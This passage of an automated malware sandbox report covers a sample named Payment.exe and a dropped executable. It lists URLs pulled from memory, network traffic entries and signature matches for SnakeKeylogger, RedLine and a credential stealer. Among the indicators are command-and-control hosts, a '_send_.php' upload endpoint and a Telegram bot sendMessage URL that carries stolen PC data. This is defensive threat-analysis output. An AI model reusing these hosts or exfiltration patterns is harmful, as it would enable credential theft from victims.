                  Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.13.20:80/pawvnqqcihuodvw
                  Source: Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.142.91.111/
                  Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.142.91.111/dpyks
                  Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.142.91.111/gfoywiqg
                  Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.142.91.111/oqljmnqcm
                  Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.142.91.111/oqljmnqcm4
                  Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.142.91.111/tknftu
                  Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.142.91.111:80/tknftu
                  Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/buvxjx
                  Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/lpjrtgtrcj
                  Source: Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.229.117.57/
                  Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.229.117.57/tcyrkgcmm
                  Source: Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.229.166.50/
                  Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.229.166.50/pabdnlclvrbkpy
                  Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.245.175.187/idmrbxil
                  Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.245.175.187/idmrbxil&
                  Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.245.175.187/idmrbxilI
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.11.240.239/pwmdxj
                  Source: Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.212.150.54/(
                  Source: Payment.exe, 00000008.00000002.2179441071.0000000007076000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.212.150.54/uqgubhowqkworyccPL
                  Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.212.150.54/uqgubhowqkworyccc
                  Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.212.150.54:80/uqgubhowqkworycc6
                  Source: Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.26.80.133/
                  Source: Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.26.80.133/0?
                  Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.26.80.133/hmjljoygme
                  Source: Payment.exe, 00000008.00000002.2124505788.0000000001201000.00000004.00000020.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2179441071.0000000007076000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.26.80.133/klwkdohmlimacmer
                  Source: Payment.exe, 00000008.00000002.2124505788.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.26.80.133/klwkdohmlimacmerl
                  Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.26.80.133/wwhsdeosr
                  Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.26.80.133:80/klwkdohmlimacmer
                  Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.43.119.120/cgdwvsj
                  Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.169.144.97/vxrwonyL
                  Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.169.144.97/vxrwonyp
                  Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.169.144.97:80/vxrwonyvrbkpy
                  Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/
                  Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/sdhhalso
                  Source: Payment.exe, 00000008.00000002.2178910492.0000000007066000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.214.228.140/
                  Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2179441071.0000000007076000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.214.228.140/htdxfxsikhflmhhj
                  Source: Payment.exe, 00000008.00000002.2178910492.0000000007066000.00000004.00000020.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2124505788.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.214.228.140/unklgjihfthc
                  Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.214.228.140/unklgjihfthcd
                  Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.214.228.140:80/htdxfxsikhflmhhj
                  Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.214.228.140:80/unklgjihfthc
                  Source: Payment.exe, 00000008.00000002.2150772680.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.00000000039D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: Payment.exe, 00000008.00000002.2150772680.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.00000000039D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: Payment.exe, 00000008.00000002.2124505788.00000000011D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://brsua.biz/d
                  Source: jwBqGZseW.exe, 00000027.00000002.2138445632.00000000039D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: Payment.exe, 00000008.00000002.2150772680.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.00000000039D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: svchost.exe, 0000002B.00000002.2143386918.0000019D59200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: Payment.exe, 00000008.00000002.2124505788.00000000011D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://esuzf.biz/
                  Source: svchost.exe, 0000002B.00000003.1203309926.0000019D58FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gnqgo.biz/H$
                  Source: Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jpskm.biz/
                  Source: Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qpnczch.biz//
                  Source: Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://saytjshyf.biz/
                  Source: Payment.exeString found in binary or memory: http://schemas.m
                  Source: Payment.exe, 00000000.00000002.899266087.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2150772680.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000012.00000002.1037469944.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.00000000039D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Payment.exeString found in binary or memory: http://tempuri.org/DataSet1.xsdIStudent_Housing.Properties.Resources
                  Source: Payment.exe, 00000008.00000002.2150772680.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.00000000039D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vyome.biz/
                  Source: Payment.exe, 00000008.00000002.2124505788.0000000001239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.fwiwk.biz/wjuw?usid=27&utid=12022910910
                  Source: Payment.exe, 00000008.00000002.2124505788.0000000001239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.przvgke.biz/ryyftbrdpkr?usid=27&utid=12022893059
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Pref/StateMachine
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Pref/StateMachinehttps://PrefSyncJob/com
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/RFList
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload
                  Source: jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                  Source: Payment.exe, 00000008.00000002.2150772680.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: Payment.exe, 00000008.00000002.2150772680.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: Payment.exe, 00000008.00000002.2150772680.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: Payment.exe, 00000008.00000002.2150772680.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:PC-MLN150%0D%0ADate%
                  Source: jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003B67000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003ADF000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003B58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003B62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBLr
                  Source: notification_helper.exe.8.drString found in binary or memory: https://clients2.google.com/cr/report
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://comments.adobe.io
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://comments.adobe.io/schemas/annots_metadata.jsonld
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://comments.adobe.io/schemas/bulk_entity_v1.json
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://comments.adobe.io/schemas/entity_v1.json
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://comments.adobe.io/schemas/user_comment_metadata_result_v1.json
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://dc-api.adobe.io/discovery
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://dc-api.adobe.io/discoverySoftware
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://dc-api.adobe.io/schemas/discovery_v1.json
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://dc-api.adobe.io/schemas/folder_listing_v1.json
                  Source: jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                  Source: jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: default-browser-agent.exe.8.drString found in binary or memory: https://firefox.settings.services.mozilla.com/v1
                  Source: default-browser-agent.exe.8.drString found in binary or memory: https://firefox.settings.services.mozilla.com/v1MaybeMigrateVersion1118.0.1.0in
                  Source: svchost.exe, 0000002B.00000003.1203309926.0000019D59021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                  Source: svchost.exe, 0000002B.00000003.1203309926.0000019D58FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
                  Source: jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                  Source: notification_click_helper.exe.8.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
                  Source: notification_click_helper.exe.8.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
                  Source: default-browser-agent.exe.8.drString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/default-browser-agent/default-browser/1/Hash
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://lifecycleapp.operationlifecycle.shutdownlifecycle.startuptimer.starttimertimer.stoppedtimer.
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://notify-stage.adobe.io/ans
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://notify-stage.adobe.io/ans/
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://notify-stage.adobe.io/anshttps://notify.adobe.io/ansEnableDesktopNotificationlocale
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://notify.adobe.io/ans
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://notify.adobe.io/ans/
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://p13n-stage.adobe.io/psdk/v2/content?
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://p13n-stage.adobe.io/psdk/v2/content?https://p13n.adobe.io/psdk/v2/content?%Y-%m-%dT%H:%M:%SZ
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://p13n.adobe.io/psdk/v2/content?
                  Source: Payment.exe, 00000008.00000002.2150772680.0000000003D40000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003A4E000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003A94000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003A24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, Payment.exe, 00000008.00000002.2150772680.0000000003D40000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003A24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003A24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/45.130.83.59
                  Source: jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003A4E000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003A94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/45.130.83.59$
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://reviews.adobe.io
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://reviews.adobe.iourifullpayloadlinksinvitationURIreviewURIcommentingAssetURNEurekaInvitationI
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://scss.adobesc.com
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://scss.adobesc.com.adobe.ioassetUrnreviewUrnFilesFile
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://scss.adobesc.com0
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://scss.adobesc.comAcroCoreSyncSharedReviewLoggingEnabledAcrobat_DesktopUserhttps://comments.ad
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://scss.adobesc.comK
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://scss.adobesc.comReadStatus
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://scss.adobesc.comcommandNameAdd_AnnotsDelete_AnnotsUpdate_AnnotsEurekaReviewFetchReviewUpdate
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://scss.adobesc.comemptyAnnotations
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://scss.adobesc.comhttps://scss.adobesc.comhttps://scss.adobesc.com
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://scss.adobesc.cominvalidAnnotIdList
                  Source: AdobeCollabSync.exe.8.drString found in binary or memory: https://scss.adobesc.comreasoncom.adobe.review.sdk
                  Source: AutoIt3Help.exe.8.drString found in binary or memory: https://www.autoitscript.com/site/autoit/8
                  Source: jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20w
                  Source: jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                  Source: jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003B89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003B93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBLr
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49722 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49753 version: TLS 1.2

                  System Summary

                  barindex
                  Source: 8.2.Payment.exe.3c40000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.Payment.exe.3c40000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 8.2.Payment.exe.3c40000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 18.2.jwBqGZseW.exe.43414a8.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 18.2.jwBqGZseW.exe.43414a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 18.2.jwBqGZseW.exe.44e24c8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 39.2.jwBqGZseW.exe.36cfe1e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 39.2.jwBqGZseW.exe.36cfe1e.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 39.2.jwBqGZseW.exe.36cfe1e.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
